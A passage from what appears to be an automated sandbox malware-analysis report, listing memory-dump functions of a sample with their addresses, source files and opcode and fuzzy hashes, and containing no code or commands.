                                                              • Instruction Fuzzy Hash: 45C08C305218098FC908EB6CC88480032A0FB0E214BD20090E00EC7170E22A9C80C700
                                                              Function 00007FFD9BC4E3AB Relevance: .0, Instructions: 11COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2953029862.00007FFD9BC40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC40000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ffd9bc40000_150bIjWiGH.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e9b1faa9efd37bb4aa4e56e20da0865f31bbd12524b6dc8ecb642a0a50351274
                                                              • Instruction ID: 2ccad9ac122781764db4b94cf47fe7f398c54d26def60ec8e22fb24db9be05d2
                                                              • Opcode Fuzzy Hash: e9b1faa9efd37bb4aa4e56e20da0865f31bbd12524b6dc8ecb642a0a50351274
                                                              • Instruction Fuzzy Hash: 2AD0C920B0F60F86F53E5EB1407063E65935F00300FA7643ED05F419E5CD1CB7016212
                                                              Function 00007FFD9BC478BB Relevance: .0, Instructions: 11COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2953029862.00007FFD9BC40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC40000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ffd9bc40000_150bIjWiGH.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6f4638bde2b61fcefbbb0c6687629a8e9d07f94e331dabadf6f31afb86bdf19e
                                                              • Instruction ID: 6234a99cc98e535c7a1522b85a377e87b18afbed79ebc1623f9100ad1e0ec3e4
                                                              • Opcode Fuzzy Hash: 6f4638bde2b61fcefbbb0c6687629a8e9d07f94e331dabadf6f31afb86bdf19e
                                                              • Instruction Fuzzy Hash: C7D09220B0E50F85F53A4EB1423023E22938F00301F23147FC05F518E18D187705A321
                                                              Function 00007FFD9BFD547B Relevance: .0, Instructions: 11COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2960126772.00007FFD9BFD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFD0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ffd9bfd0000_150bIjWiGH.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 88aee399057a8ae294d7c21b75ba5aea158a791c35857b1981143dab32966a3c
                                                              • Instruction ID: 738e7160496d771a4e24324d7eb40b9e602f9abf2f6247465abdc47656e00c58
                                                              • Opcode Fuzzy Hash: 88aee399057a8ae294d7c21b75ba5aea158a791c35857b1981143dab32966a3c
                                                              • Instruction Fuzzy Hash: D3D09220B1F50B85F5785EC1807223925D15F82702E22473DC05F458E18F1A7B016A12
                                                              Function 00007FFD9BFDE52B Relevance: .0, Instructions: 11COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2960126772.00007FFD9BFD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFD0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ffd9bfd0000_150bIjWiGH.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7230f68c0ed86ce50760161183ccfd4acb87f2b39e4a821ac2d4d912596c7e3c
                                                              • Instruction ID: f42d65b9dcb1de9d65d0d7d1e7d5a257388e2ecb55dba678b48c7714f5bc36f7
                                                              • Opcode Fuzzy Hash: 7230f68c0ed86ce50760161183ccfd4acb87f2b39e4a821ac2d4d912596c7e3c
                                                              • Instruction Fuzzy Hash: A5D09230B0E50F85FA795E81803033A61958F80340E6B6779C0AF818F9DB1EB7056602
                                                              Function 00007FFD9B883566 Relevance: .0, Instructions: 10COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2949087889.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ffd9b880000_150bIjWiGH.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 56265c56e835aaa8826fac22eb9ff35c8c530a31e65e55aeb6e1599614348b19
                                                              • Instruction ID: e579554b270e71ca0f18aef56bb86dc0d2b7ac33f3713915b846b4713e0978b0
                                                              • Opcode Fuzzy Hash: 56265c56e835aaa8826fac22eb9ff35c8c530a31e65e55aeb6e1599614348b19
                                                              • Instruction Fuzzy Hash: 57C04C05F18C1A17E36D7318483167E0453DF48748FD54474E42E972CEDD5C5A1306C7
                                                              Function 00007FFD9BC46DDC Relevance: .0, Instructions: 9COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2953029862.00007FFD9BC40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC40000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ffd9bc40000_150bIjWiGH.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ae9a4a536361b5a2fe42bf7321f4aa918b01c2226b1d561560d20af387c2d1da
                                                              • Instruction ID: 844b95ffcc356fec56e13343b152305ad126b42f003a334f6026be63034e3db4
                                                              • Opcode Fuzzy Hash: ae9a4a536361b5a2fe42bf7321f4aa918b01c2226b1d561560d20af387c2d1da
                                                              • Instruction Fuzzy Hash: AAC01200F0E28617EA350AF408B027C0B520F0A30275A0AB2E086850A3E8086B005220
                                                              Function 00007FFD9B8806C8 Relevance: .0, Instructions: 8COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2949087889.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ffd9b880000_150bIjWiGH.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 183926935db787c4c432a61b4ba3d14b1974444eef988ee6f68454cca7b70382
                                                              • Instruction ID: 9122e6709ab1f1bfac75832b5ef73eb2392710d0a3267cbe2607c156a0b611c9
                                                              • Opcode Fuzzy Hash: 183926935db787c4c432a61b4ba3d14b1974444eef988ee6f68454cca7b70382
                                                              • Instruction Fuzzy Hash: FBB01200D67C0F03E42433FA0C520A570405F8C210FC30070D42C400A1985E12D50282
                                                              Function 00007FFD9BC41210 Relevance: .0, Instructions: 7COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2953029862.00007FFD9BC40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC40000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ffd9bc40000_150bIjWiGH.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 34364d4a07d7653c78f2cd559b85715b34674b76c353892c3b47df23898e631a
                                                              • Instruction ID: 32a380d46ebc1d8d7f05692b67901a80a9f00bc56f4cc6aad2f0430d6c6603c8
                                                              • Opcode Fuzzy Hash: 34364d4a07d7653c78f2cd559b85715b34674b76c353892c3b47df23898e631a
                                                              • Instruction Fuzzy Hash: 42A00205D9780E11D85832FA1D9B09478549FDD118FC615A0F80981596E89E17E912A3
                                                              Function 00007FFD9BFD4993 Relevance: .0, Instructions: 6COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2960126772.00007FFD9BFD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFD0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ffd9bfd0000_150bIjWiGH.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 91adde5a74cd1c935fce39083b90a280d1e95c7cfd07e3944d1e1b43ef131098
                                                              • Instruction ID: 8e6daac4269fe18f9eb250fb403942a97d3ba36dde577b4c3700254babdf7f80
                                                              • Opcode Fuzzy Hash: 91adde5a74cd1c935fce39083b90a280d1e95c7cfd07e3944d1e1b43ef131098
                                                              • Instruction Fuzzy Hash: 42B09200F0E20B42EA3008E108A213C00400FC5201A520B38A20A552E2DE8A2A001272